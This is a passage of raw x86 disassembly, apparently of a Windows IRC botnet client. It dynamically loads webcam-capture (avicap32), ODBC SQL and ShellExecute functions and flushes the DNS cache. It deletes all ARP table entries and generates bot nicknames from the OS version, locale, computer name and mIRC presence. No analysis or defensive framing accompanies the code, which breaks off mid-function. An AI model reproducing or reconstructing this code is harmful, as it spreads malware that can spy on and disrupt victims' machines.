jmp short loc_40A481
; ---------------------------------------------------------------------------
loc_40A476: ; CODE XREF: sub_409909+B19�j
call ds:dword_427094 ; RtlGetLastWin32Error
mov dword_4CBAE8, eax
loc_40A481: ; CODE XREF: sub_409909+B55�j
; sub_409909+B5D�j ...
mov dword_4CBAE4, 1
loc_40A48B: ; CODE XREF: sub_409909+B69�j
push offset aShell32_dll ; "shell32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_40A4C0
push offset aShellexecutea ; "ShellExecuteA"
push edi
call esi ; GetProcAddress
push offset aShchangenotify ; "SHChangeNotify"
push edi
mov dword_4CB940, eax
call esi ; GetProcAddress
cmp dword_4CB940, ebx
mov dword_4CBA48, eax
jz short loc_40A4CB
cmp eax, ebx
jnz short loc_40A4D5
jmp short loc_40A4CB
; ---------------------------------------------------------------------------
loc_40A4C0: ; CODE XREF: sub_409909+B8D�j
call ds:dword_427094 ; RtlGetLastWin32Error
mov dword_4CBAF0, eax
loc_40A4CB: ; CODE XREF: sub_409909+BAF�j
; sub_409909+BB5�j
mov dword_4CBAEC, 1
loc_40A4D5: ; CODE XREF: sub_409909+BB3�j
push offset aOdbc32_dll ; "odbc32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_40A55E
push offset aSqldriverconne ; "SQLDriverConnect"
push edi
call esi ; GetProcAddress
push offset aSqlsetenvattr ; "SQLSetEnvAttr"
push edi
mov dword_4CBA10, eax
call esi ; GetProcAddress
push offset aSqlexecdirect ; "SQLExecDirect"
push edi
mov dword_4CBA5C, eax
call esi ; GetProcAddress
push offset aSqlallochandle ; "SQLAllocHandle"
push edi
mov dword_4CB998, eax
call esi ; GetProcAddress
push offset aSqlfreehandle ; "SQLFreeHandle"
push edi
mov dword_4CB950, eax
call esi ; GetProcAddress
push offset aSqldisconnect ; "SQLDisconnect"
push edi
mov dword_4CB9F0, eax
call esi ; GetProcAddress
cmp dword_4CBA10, ebx
mov dword_4CB960, eax
jz short loc_40A569
cmp dword_4CBA5C, ebx
jz short loc_40A569
cmp dword_4CB998, ebx
jz short loc_40A569
cmp dword_4CB950, ebx
jz short loc_40A569
cmp dword_4CB9F0, ebx
jz short loc_40A569
cmp eax, ebx
jnz short loc_40A573
jmp short loc_40A569
; ---------------------------------------------------------------------------
loc_40A55E: ; CODE XREF: sub_409909+BD7�j
call ds:dword_427094 ; RtlGetLastWin32Error
mov dword_4CBAF8, eax
loc_40A569: ; CODE XREF: sub_409909+C2D�j
; sub_409909+C35�j ...
mov dword_4CBAF4, 1
loc_40A573: ; CODE XREF: sub_409909+C51�j
push offset aAvicap32_dll ; "avicap32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_40A5A8
push offset aCapcreatecaptu ; "capCreateCaptureWindowA"
push edi
call esi ; GetProcAddress
push offset aCapgetdriverde ; "capGetDriverDescriptionA"
push edi
mov dword_4CB924, eax
call esi ; GetProcAddress
cmp dword_4CB924, ebx
mov dword_4CBA04, eax
jz short loc_40A5B3
cmp eax, ebx
jnz short loc_40A5BD
jmp short loc_40A5B3
; ---------------------------------------------------------------------------
loc_40A5A8: ; CODE XREF: sub_409909+C75�j
call ds:dword_427094 ; RtlGetLastWin32Error
mov dword_4CBB00, eax
loc_40A5B3: ; CODE XREF: sub_409909+C97�j
; sub_409909+C9D�j
mov dword_4CBAFC, 1
loc_40A5BD: ; CODE XREF: sub_409909+C9B�j
push 1
pop eax
pop edi
pop esi
pop ebp
pop ebx
retn
sub_409909 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A5C5 proc near ; CODE XREF: sub_401ACD+2511�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 200h
push ebx
mov ebx, [ebp+arg_4]
push esi
xor esi, esi
cmp dword_4CBA94, esi
push edi
mov edi, [ebp+arg_8]
jz short loc_40A60D
push dword_4CBA98
lea eax, [ebp+var_200]
push offset aKernel32_dllFa ; "Kernel32.dll failed. <%d>"
push eax
call sub_41C266
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_409869
add esp, 20h
loc_40A60D: ; CODE XREF: sub_40A5C5+1A�j
cmp dword_4CBA9C, esi
jz short loc_40A641
push dword_4CBAA0
lea eax, [ebp+var_200]
push offset aUser32_dllFail ; "User32.dll failed. <%d>"
push eax
call sub_41C266
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_409869
add esp, 20h
loc_40A641: ; CODE XREF: sub_40A5C5+4E�j
cmp dword_4CBAA4, esi
jz short loc_40A675
push dword_4CBAA8
lea eax, [ebp+var_200]
push offset aAdvapi32_dllFa ; "Advapi32.dll failed. <%d>"
push eax
call sub_41C266
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_409869
add esp, 20h
loc_40A675: ; CODE XREF: sub_40A5C5+82�j
cmp dword_4CBAAC, esi
jz short loc_40A6A9
push dword_4CBAB0
lea eax, [ebp+var_200]
push offset aGdi32_dllFaile ; "Gdi32.dll failed. <%d>"
push eax
call sub_41C266
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_409869
add esp, 20h
loc_40A6A9: ; CODE XREF: sub_40A5C5+B6�j
cmp dword_4CBAB4, esi
jz short loc_40A6DD
push dword_4CBAB8
lea eax, [ebp+var_200]
push offset aWs2_32_dllFail ; "Ws2_32.dll failed. <%d>"
push eax
call sub_41C266
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_409869
add esp, 20h
loc_40A6DD: ; CODE XREF: sub_40A5C5+EA�j
cmp dword_4CBABC, esi
jz short loc_40A711
push dword_4CBAC0
lea eax, [ebp+var_200]
push offset aWininet_dllFai ; "Wininet.dll failed. <%d>"
push eax
call sub_41C266
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_409869
add esp, 20h
loc_40A711: ; CODE XREF: sub_40A5C5+11E�j
cmp dword_4CBAC4, esi
jz short loc_40A745
push dword_4CBAC8
lea eax, [ebp+var_200]
push offset aIcmp_dllFailed ; "Icmp.dll failed. <%d>"
push eax
call sub_41C266
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_409869
add esp, 20h
loc_40A745: ; CODE XREF: sub_40A5C5+152�j
cmp dword_4CBACC, esi
jz short loc_40A779
push dword_4CBAD0
lea eax, [ebp+var_200]
push offset aNetapi32_dllFa ; "Netapi32.dll failed. <%d>"
push eax
call sub_41C266
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_409869
add esp, 20h
loc_40A779: ; CODE XREF: sub_40A5C5+186�j
cmp dword_4CBAD4, esi
jz short loc_40A7AD
push dword_4CBAD8
lea eax, [ebp+var_200]
push offset aDnsapi_dllFail ; "Dnsapi.dll failed. <%d>"
push eax
call sub_41C266
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_409869
add esp, 20h
loc_40A7AD: ; CODE XREF: sub_40A5C5+1BA�j
cmp dword_4CBADC, esi
jz short loc_40A7E1
push dword_4CBAE0
lea eax, [ebp+var_200]
push offset aIphlpapi_dllFa ; "Iphlpapi.dll failed. <%d>"
push eax
call sub_41C266
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_409869
add esp, 20h
loc_40A7E1: ; CODE XREF: sub_40A5C5+1EE�j
cmp dword_4CBAE4, esi
jz short loc_40A815
push dword_4CBAE8
lea eax, [ebp+var_200]
push offset aMpr32_dllFaile ; "Mpr32.dll failed. <%d>"
push eax
call sub_41C266
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_409869
add esp, 20h
loc_40A815: ; CODE XREF: sub_40A5C5+222�j
cmp dword_4CBAEC, esi
jz short loc_40A849
push dword_4CBAF0
lea eax, [ebp+var_200]
push offset aShell32_dllFai ; "Shell32.dll failed. <%d>"
push eax
call sub_41C266
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_409869
add esp, 20h
loc_40A849: ; CODE XREF: sub_40A5C5+256�j
cmp dword_4CBAF4, esi
jz short loc_40A87D
push dword_4CBAF8
lea eax, [ebp+var_200]
push offset aOdbc32_dllFail ; "Odbc32.dll failed. <%d>"
push eax
call sub_41C266
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_409869
add esp, 20h
loc_40A87D: ; CODE XREF: sub_40A5C5+28A�j
cmp dword_4CBAFC, esi
jz short loc_40A8B1
push dword_4CBB00
lea eax, [ebp+var_200]
push offset aAvicap32_dllFa ; "Avicap32.dll failed. <%d>"
push eax
loc_40A897: ; DATA XREF: .data:0043320C�o
; .data:00433250�o ...
call sub_41C266
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_409869
add esp, 20h
loc_40A8B1: ; CODE XREF: sub_40A5C5+2BE�j
lea eax, [ebp+var_200]
push offset unk_42D6C4
push eax
call sub_41C266
cmp [ebp+arg_C], esi
pop ecx
pop ecx
jnz short loc_40A8DE
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_409869
add esp, 14h
loc_40A8DE: ; CODE XREF: sub_40A5C5+302�j
lea eax, [ebp+var_200]
push eax
call sub_415D38
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_40A5C5 endp
; =============== S U B R O U T I N E =======================================
sub_40A8F0 proc near ; CODE XREF: sub_4017ED+4F�p
; sub_401ACD+5BC5�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call dword_4CBA14 ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short locret_40A918
push [esp+arg_0]
call dword_4CBA58 ; gethostbyname
test eax, eax
jnz short loc_40A911
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_40A911: ; CODE XREF: sub_40A8F0+1B�j
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
locret_40A918: ; CODE XREF: sub_40A8F0+D�j
retn
sub_40A8F0 endp
; =============== S U B R O U T I N E =======================================
sub_40A919 proc near ; CODE XREF: sub_4017ED+D6�p
mov ecx, dword_4CB8F0
xor eax, eax
test ecx, ecx
jz short locret_40A927
call ecx ; DnsFlushResolverCache
locret_40A927: ; CODE XREF: sub_40A919+A�j
retn
sub_40A919 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A928 proc near ; CODE XREF: sub_401ACD:loc_403F03�p
var_88 = byte ptr -88h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 88h
push ebx
push esi
push edi
push 1
pop ebx
lea eax, [ebp+var_8]
xor edi, edi
push ebx
push eax
push edi
xor esi, esi
mov [ebp+var_8], edi
mov [ebp+var_4], ebx
call dword_4CBA50 ; GetIpNetTable
mov ecx, eax
sub ecx, edi
jz loc_40A9EE
sub ecx, 32h
jz loc_40A9E7
sub ecx, 48h
jz short loc_40A988
sub ecx, 6Eh
jz short loc_40A981
loc_40A96A: ; CODE XREF: sub_40A928+8B�j
push eax
lea eax, [ebp+var_88]
push offset unk_42D8D8
push eax
call sub_41C266
add esp, 0Ch
jmp short loc_40A9C8
; ---------------------------------------------------------------------------
loc_40A981: ; CODE XREF: sub_40A928+40�j
push offset unk_42D8B4
jmp short loc_40A9BA
; ---------------------------------------------------------------------------
loc_40A988: ; CODE XREF: sub_40A928+3B�j
push [ebp+var_8]
call sub_41BEB5
push [ebp+var_8]
mov esi, eax
push edi
push esi
call sub_41BF70
add esp, 10h
cmp esi, edi
jz short loc_40A9B5
lea eax, [ebp+var_8]
push ebx
push eax
push esi
call dword_4CBA50 ; GetIpNetTable
cmp eax, edi
jz short loc_40A9EE
jmp short loc_40A96A
; ---------------------------------------------------------------------------
loc_40A9B5: ; CODE XREF: sub_40A928+79�j
push offset unk_42D884
loc_40A9BA: ; CODE XREF: sub_40A928+5E�j
; sub_40A928+C4�j
lea eax, [ebp+var_88]
push eax
call sub_41C266
pop ecx
pop ecx
loc_40A9C8: ; CODE XREF: sub_40A928+57�j
lea eax, [ebp+var_88]
mov [ebp+var_4], edi
push eax
call sub_415D38
pop ecx
loc_40A9D8: ; CODE XREF: sub_40A928+C8�j
; sub_40A928+DC�j
push esi
call sub_41BA91
mov eax, [ebp+var_4]
pop ecx
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40A9E7: ; CODE XREF: sub_40A928+32�j
push offset unk_42D854
jmp short loc_40A9BA
; ---------------------------------------------------------------------------
loc_40A9EE: ; CODE XREF: sub_40A928+29�j
; sub_40A928+89�j
cmp [esi], edi
jbe short loc_40A9D8
lea ebx, [esi+4]
loc_40A9F5: ; CODE XREF: sub_40A928+DA�j
push ebx
call dword_4CBA4C ; DeleteIpNetEntry
inc edi
add ebx, 18h
cmp edi, [esi]
jb short loc_40A9F5
jmp short loc_40A9D8
sub_40A928 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AA06 proc near ; CODE XREF: sub_401ACD+21ED�p
; sub_401ACD+233E�p ...
var_14 = byte ptr -14h
var_10 = byte ptr -10h
var_F = byte ptr -0Fh
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
push esi
push 10h
pop eax
mov [ebp+var_4], eax
push eax
lea eax, [ebp+var_14]
push 0
push eax
call sub_41BF70
add esp, 0Ch
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
call dword_4CB978 ; getsockname
movzx eax, [ebp+var_D]
push eax
mov esi, offset dword_4CBB04
movzx eax, [ebp+var_E]
push eax
movzx eax, [ebp+var_F]
push eax
movzx eax, [ebp+var_10]
push eax
push offset aD_D_D_D ; "%d.%d.%d.%d"
push esi
call sub_41C266
add esp, 18h
mov eax, esi
pop esi
leave
retn
sub_40AA06 endp
; =============== S U B R O U T I N E =======================================
sub_40AA5F proc near ; CODE XREF: sub_413694+24C�p
; sub_413694+292�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_4]
xor eax, eax
cmp esi, 1
jle short loc_40AA88
mov ecx, esi
push edi
shr ecx, 1
mov edx, ecx
neg edx
lea esi, [esi+edx*2]
mov edx, [esp+8+arg_0]
loc_40AA7B: ; CODE XREF: sub_40AA5F+24�j
movzx edi, word ptr [edx]
add eax, edi
inc edx
inc edx
dec ecx
jnz short loc_40AA7B
pop edi
jmp short loc_40AA8C
; ---------------------------------------------------------------------------
loc_40AA88: ; CODE XREF: sub_40AA5F+A�j
mov edx, [esp+4+arg_0]
loc_40AA8C: ; CODE XREF: sub_40AA5F+27�j
test esi, esi
pop esi
jz short loc_40AA96
movzx ecx, byte ptr [edx]
add eax, ecx
loc_40AA96: ; CODE XREF: sub_40AA5F+30�j
mov ecx, eax
and eax, 0FFFFh
shr ecx, 10h
add ecx, eax
mov eax, ecx
shr eax, 10h
add eax, ecx
not eax
retn
sub_40AA5F endp
; =============== S U B R O U T I N E =======================================
sub_40AAAC proc near ; CODE XREF: sub_40AE84+49�p
; DATA XREF: .data:off_42D920�o
arg_0 = dword ptr 4
push esi
push edi
call ds:dword_4270B0 ; GetTickCount
push eax
call sub_41C2B8
pop ecx
call sub_41C2C2
xor edx, edx
mov ecx, 48Fh
div ecx
mov edi, [esp+8+arg_0]
push off_42D99C[edx*4]
push offset aS_8 ; "%s"
push 1Ch
push edi
call sub_41C360
xor esi, esi
add esp, 10h
cmp dword_429098, esi
jle short loc_40AB14
loc_40AAEE: ; CODE XREF: sub_40AAAC+66�j
call sub_41C2C2
push 0Ah
cdq
pop ecx
idiv ecx
push edx
push edi
push offset aSI ; "%s%i"
push 1Ch
push edi
call sub_41C360
add esp, 14h
inc esi
cmp esi, dword_429098
jl short loc_40AAEE
loc_40AB14: ; CODE XREF: sub_40AAAC+40�j
mov eax, edi
pop edi
pop esi
retn
sub_40AAAC endp
; ---------------------------------------------------------------------------
push esi
push edi
call ds:dword_4270B0 ; GetTickCount
push eax
call sub_41C2B8
mov edi, [esp+10h]
mov dword ptr [esp], offset asc_429138 ; "-"
push offset aS_8 ; "%s"
push 1Ch
push edi
call sub_41C360
xor esi, esi
add esp, 10h
cmp dword_429098, esi
jle short loc_40AB72
loc_40AB4C: ; CODE XREF: .text:0040AB70�j
call sub_41C2C2
push 0Ah
cdq
pop ecx
idiv ecx
push edx
push edi
push offset aSI ; "%s%i"
push 1Ch
push edi
call sub_41C360
add esp, 14h
inc esi
cmp esi, dword_429098
jl short loc_40AB4C
loc_40AB72: ; CODE XREF: .text:0040AB4A�j
mov eax, edi
pop edi
pop esi
retn
; =============== S U B R O U T I N E =======================================
sub_40AB77 proc near ; CODE XREF: sub_401ACD+68EE�p
arg_0 = dword ptr 4
push ebx
push esi
push edi
call ds:dword_4270B0 ; GetTickCount
push eax
call sub_41C2B8
pop ecx
call sub_41C2C2
push 3
mov ebx, [esp+10h+arg_0]
cdq
pop ecx
xor edi, edi
idiv ecx
mov esi, edx
add esi, dword_429098
test esi, esi
jle short loc_40ABBA
loc_40ABA4: ; CODE XREF: sub_40AB77+41�j
call sub_41C2C2
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov [edi+ebx], dl
inc edi
cmp edi, esi
jl short loc_40ABA4
loc_40ABBA: ; CODE XREF: sub_40AB77+2B�j
and byte ptr [edi+ebx], 0
pop edi
mov eax, ebx
pop esi
pop ebx
retn
sub_40AB77 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push ecx
and dword ptr [ebp-4], 0
push esi
push edi
mov dword ptr [ebp-8], 100h
call ds:dword_4270B0 ; GetTickCount
push eax
call sub_41C2B8
pop ecx
lea eax, [ebp-8]
mov esi, offset byte_4315F4
push eax
push esi
call ds:dword_4270C8 ; GetComputerNameA
movsx eax, byte_4315F4
push 41h
pop ecx
push 1
pop edx
loc_40AC00: ; CODE XREF: .text:0040AC0B�j
cmp eax, ecx
jnz short loc_40AC07
mov [ebp-4], edx
loc_40AC07: ; CODE XREF: .text:0040AC02�j
inc ecx
cmp ecx, 5Bh
jl short loc_40AC00
push 61h
pop ecx
loc_40AC10: ; CODE XREF: .text:0040AC1B�j
cmp eax, ecx
jnz short loc_40AC17
mov [ebp-4], edx
loc_40AC17: ; CODE XREF: .text:0040AC12�j
inc ecx
cmp ecx, 7Bh
jl short loc_40AC10
mov edi, [ebp+8]
push esi
push 1Ch
push edi
call sub_41C360
xor esi, esi
add esp, 0Ch
cmp dword_429098, esi
jle short loc_40AC5C
loc_40AC36: ; CODE XREF: .text:0040AC5A�j
call sub_41C2C2
push 0Ah
cdq
pop ecx
idiv ecx
push edx
push edi
push offset aSI ; "%s%i"
push 1Ch
push edi
call sub_41C360
add esp, 14h
inc esi
cmp esi, dword_429098
jl short loc_40AC36
loc_40AC5C: ; CODE XREF: .text:0040AC34�j
mov eax, edi
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
call ds:dword_4270B0 ; GetTickCount
push eax
call sub_41C2B8
pop ecx
lea eax, [ebp-0Ch]
push 0Ah
push eax
push 7
push 800h
call ds:dword_4270CC ; GetLocaleInfoA
mov edi, [ebp+8]
lea eax, [ebp-0Ch]
push eax
push offset dword_4315F8
push 1Ch
push edi
call sub_41C360
xor esi, esi
add esp, 10h
cmp dword_429098, esi
jle short loc_40ACD1
loc_40ACAB: ; CODE XREF: .text:0040ACCF�j
call sub_41C2C2
push 0Ah
cdq
pop ecx
idiv ecx
push edx
push edi
push offset aSI ; "%s%i"
push 1Ch
push edi
call sub_41C360
add esp, 14h
inc esi
cmp esi, dword_429098
jl short loc_40ACAB
loc_40ACD1: ; CODE XREF: .text:0040ACA9�j
mov eax, edi
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 94h
push esi
lea eax, [ebp-94h]
push edi
push eax
mov esi, offset byte_43DB88
mov dword ptr [ebp-94h], 94h
call ds:dword_4270D0 ; GetVersionExA
call ds:dword_4270B0 ; GetTickCount
push eax
call sub_41C2B8
cmp dword ptr [ebp-90h], 4
pop ecx
jnz short loc_40AD5B
cmp dword ptr [ebp-8Ch], 0
jnz short loc_40AD3B
cmp dword ptr [ebp-84h], 1
jnz short loc_40AD2B
mov esi, offset a95 ; "95"
loc_40AD2B: ; CODE XREF: .text:0040AD24�j
cmp dword ptr [ebp-84h], 2
jnz short loc_40AD97
mov esi, offset aNt_0 ; "NT"
jmp short loc_40AD97
; ---------------------------------------------------------------------------
loc_40AD3B: ; CODE XREF: .text:0040AD1B�j
cmp dword ptr [ebp-8Ch], 0Ah
jnz short loc_40AD4B
mov esi, offset a98 ; "98"
jmp short loc_40AD97
; ---------------------------------------------------------------------------
loc_40AD4B: ; CODE XREF: .text:0040AD42�j
cmp dword ptr [ebp-8Ch], 5Ah
jnz short loc_40AD92
mov esi, offset aMe_0 ; "ME"
jmp short loc_40AD97
; ---------------------------------------------------------------------------
loc_40AD5B: ; CODE XREF: .text:0040AD12�j
cmp dword ptr [ebp-90h], 5
jnz short loc_40AD92
cmp dword ptr [ebp-8Ch], 0
jnz short loc_40AD74
mov esi, offset a2k ; "2K"
jmp short loc_40AD97
; ---------------------------------------------------------------------------
loc_40AD74: ; CODE XREF: .text:0040AD6B�j
cmp dword ptr [ebp-8Ch], 1
jnz short loc_40AD84
mov esi, offset aXp ; "XP"
jmp short loc_40AD97
; ---------------------------------------------------------------------------
loc_40AD84: ; CODE XREF: .text:0040AD7B�j
cmp dword ptr [ebp-8Ch], 2
mov esi, offset a2k3 ; "2K3"
jz short loc_40AD97
loc_40AD92: ; CODE XREF: .text:0040AD52�j
; .text:0040AD62�j
mov esi, offset a??? ; "???"
loc_40AD97: ; CODE XREF: .text:0040AD32�j
; .text:0040AD39�j ...
mov edi, [ebp+8]
push esi
push offset aS_0 ; "[%s]|"
push 1Ch
push edi
call sub_41C360
xor esi, esi
add esp, 10h
cmp dword_429098, esi
jle short loc_40ADDB
loc_40ADB5: ; CODE XREF: .text:0040ADD9�j
call sub_41C2C2
push 0Ah
cdq
pop ecx
idiv ecx
push edx
push edi
push offset aSI ; "%s%i"
push 1Ch
push edi
call sub_41C360
add esp, 14h
inc esi
cmp esi, dword_429098
jl short loc_40ADB5
loc_40ADDB: ; CODE XREF: .text:0040ADB3�j
mov eax, edi
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40ADE1 proc near ; CODE XREF: sub_40AE84+5C�p
var_1C = byte ptr -1Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1Ch
push esi
call ds:dword_4270B0 ; GetTickCount
xor edx, edx
mov ecx, 5265C00h
div ecx
push 0
push offset aMirc_0 ; "mIRC"
mov esi, eax
cmp esi, 64h
jbe short loc_40AE30
call dword_4CB9E0 ; FindWindowA
test eax, eax
mov eax, offset aM ; "[M]"
jnz short loc_40AE19
mov eax, offset byte_43DB88
loc_40AE19: ; CODE XREF: sub_40ADE1+31�j
push eax
push esi
push offset aDS ; "[%d]%s"
lea eax, [ebp+var_1C]
push 1Ch
push eax
call sub_41C360
add esp, 14h
jmp short loc_40AE50
; ---------------------------------------------------------------------------
loc_40AE30: ; CODE XREF: sub_40ADE1+22�j
call dword_4CB9E0 ; FindWindowA
test eax, eax
mov eax, offset aM ; "[M]"
jnz short loc_40AE44
mov eax, offset byte_43DB88
loc_40AE44: ; CODE XREF: sub_40ADE1+5C�j
push eax
lea eax, [ebp+var_1C]
push eax
call sub_41C266
pop ecx
pop ecx
loc_40AE50: ; CODE XREF: sub_40ADE1+4D�j
lea eax, [ebp+var_1C]
push eax
call sub_41B9C0
pop ecx
cmp eax, 2
pop esi
jbe short loc_40AE7F
push 1Ch
lea eax, [ebp+var_1C]
push [ebp+arg_0]
push eax
call sub_41CBC0
lea eax, [ebp+var_1C]
push 1Ch
push eax
push [ebp+arg_0]
call sub_41BFD0
add esp, 18h
loc_40AE7F: ; CODE XREF: sub_40ADE1+7D�j
mov eax, [ebp+arg_0]
leave
retn
sub_40ADE1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AE84 proc near ; CODE XREF: sub_4017ED+7F�p
; sub_401955+50�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push esi
push edi
xor edi, edi
mov esi, offset dword_42D91C
loc_40AE90: ; CODE XREF: sub_40AE84+3F�j
cmp [ebp+arg_C], 0
jz short loc_40AEAB
lea eax, [esi-0Ch]
push eax
push [ebp+arg_C]
call sub_41CA50
neg eax
pop ecx
sbb eax, eax
pop ecx
inc eax
jmp short loc_40AEB5
; ---------------------------------------------------------------------------
loc_40AEAB: ; CODE XREF: sub_40AE84+10�j
mov ecx, [esi]
xor eax, eax
cmp ecx, [ebp+arg_4]
setz al
loc_40AEB5: ; CODE XREF: sub_40AE84+25�j
test eax, eax
jnz short loc_40AEC7
add esi, 14h
inc edi
cmp esi, offset off_42D9A8
jb short loc_40AE90
jmp short loc_40AED5
; ---------------------------------------------------------------------------
loc_40AEC7: ; CODE XREF: sub_40AE84+33�j
push [ebp+arg_0]
lea eax, [edi+edi*4]
call off_42D920[eax*4]
pop ecx
loc_40AED5: ; CODE XREF: sub_40AE84+41�j
cmp [ebp+arg_8], 0
pop edi
pop esi
jz short loc_40AEE8
push [ebp+arg_0]
call sub_40ADE1
pop ecx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40AEE8: ; CODE XREF: sub_40AE84+57�j
mov eax, [ebp+arg_0]
pop ebp
retn
sub_40AE84 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0B8h
push ebx
push esi
lea eax, [ebp-0B8h]
push edi
push eax
mov edi, offset byte_43DB88
mov dword ptr [ebp-0B8h], 94h
call ds:dword_4270D0 ; GetVersionExA
cmp dword ptr [ebp-0B4h], 4
push 0Ah
pop ebx
jnz short loc_40AF67
cmp dword ptr [ebp-0B0h], 0
jnz short loc_40AF48
cmp dword ptr [ebp-0A8h], 1
jnz short loc_40AF38
mov edi, offset a95 ; "95"
loc_40AF38: ; CODE XREF: .text:0040AF31�j
cmp dword ptr [ebp-0A8h], 2
jnz short loc_40AFA3
mov edi, offset aNt_0 ; "NT"
jmp short loc_40AFA3
; ---------------------------------------------------------------------------
loc_40AF48: ; CODE XREF: .text:0040AF28�j
cmp [ebp-0B0h], ebx
jnz short loc_40AF57
mov edi, offset a98 ; "98"
jmp short loc_40AFA3
; ---------------------------------------------------------------------------
loc_40AF57: ; CODE XREF: .text:0040AF4E�j
cmp dword ptr [ebp-0B0h], 5Ah
jnz short loc_40AF9E
mov edi, offset aMe_0 ; "ME"
jmp short loc_40AFA3
; ---------------------------------------------------------------------------
loc_40AF67: ; CODE XREF: .text:0040AF1F�j
cmp dword ptr [ebp-0B4h], 5
jnz short loc_40AF9E
cmp dword ptr [ebp-0B0h], 0
jnz short loc_40AF80
mov edi, offset a2k ; "2K"
jmp short loc_40AFA3
; ---------------------------------------------------------------------------
loc_40AF80: ; CODE XREF: .text:0040AF77�j
cmp dword ptr [ebp-0B0h], 1
jnz short loc_40AF90
mov edi, offset aXp ; "XP"
jmp short loc_40AFA3
; ---------------------------------------------------------------------------
loc_40AF90: ; CODE XREF: .text:0040AF87�j
cmp dword ptr [ebp-0B0h], 2
mov edi, offset dword_431684
jz short loc_40AFA3
loc_40AF9E: ; CODE XREF: .text:0040AF5E�j
; .text:0040AF6E�j
mov edi, offset dword_431680
loc_40AFA3: ; CODE XREF: .text:0040AF3F�j
; .text:0040AF46�j ...
lea eax, [ebp-0A4h]
push offset word_4CB88C
push eax
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_40AFC1
mov esi, offset dword_43167C
jmp short loc_40B03C
; ---------------------------------------------------------------------------
loc_40AFC1: ; CODE XREF: .text:0040AFB8�j
lea eax, [ebp-0A4h]
push offset a1 ; "1"
push eax
call sub_41C2E0
pop ecx
test eax, eax
pop ecx
jz short loc_40AFDF
mov esi, offset dword_431678
jmp short loc_40B03C
; ---------------------------------------------------------------------------
loc_40AFDF: ; CODE XREF: .text:0040AFD6�j
lea eax, [ebp-0A4h]
push offset dword_431674
push eax
call sub_41C2E0
pop ecx
test eax, eax
pop ecx
jz short loc_40AFFD
mov esi, offset dword_431670
jmp short loc_40B03C
; ---------------------------------------------------------------------------
loc_40AFFD: ; CODE XREF: .text:0040AFF4�j
lea eax, [ebp-0A4h]
push offset dword_43166C
push eax
call sub_41C2E0
pop ecx
test eax, eax
pop ecx
jz short loc_40B01B
mov esi, offset dword_431668
jmp short loc_40B03C
; ---------------------------------------------------------------------------
loc_40B01B: ; CODE XREF: .text:0040B012�j
lea eax, [ebp-0A4h]
push offset dword_431664
push eax
call sub_41C2E0
pop ecx
mov esi, offset dword_431660
test eax, eax
pop ecx
jnz short loc_40B03C
mov esi, offset off_43165C
loc_40B03C: ; CODE XREF: .text:0040AFBF�j
; .text:0040AFDD�j ...
lea eax, [ebp-0Ch]
or dword ptr [ebp-4], 0FFFFFFFFh
push eax
or dword ptr [ebp-8], 0FFFFFFFFh
